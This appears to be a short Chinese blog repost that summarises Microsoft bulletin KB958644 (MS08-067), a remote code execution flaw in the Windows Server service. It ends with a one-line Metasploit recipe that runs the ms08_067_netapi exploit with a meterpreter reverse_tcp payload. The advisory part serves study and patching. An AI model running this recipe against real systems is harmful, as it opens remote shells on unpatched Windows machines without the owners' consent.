发布日期:2008/10/22
受影响的操作系统: Windows 2000;XP;Server 2003;Vista;Server 2008;7 Beta
(漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统)
微软安全公告--- KB958644
摘要:
此安全更新解决了服务器服务中一个秘密报告的漏洞。
如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞 可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未 经身份验证即可利用
漏洞运行任意代码。
此漏洞可能用于进行蠕虫攻击。
防火墙最佳做法和标准的默认防火墙配置有助于保护网络资源免受从企业外部发起的攻击。
可以通过安装本 Microsoft 更新程序来保护计算机不受侵害。
安装后,可能必须重新启动计算机。
流程:
kali --> msfconsole -->search ms08_067 --> use exploit/windows/smb/ms08_067_netapi --->set payload windows/meterpreter/reverse_tcp -->show options --> set LHOST -->run
转:https://www.cnblogs.com/-zhong/p/11058602.html
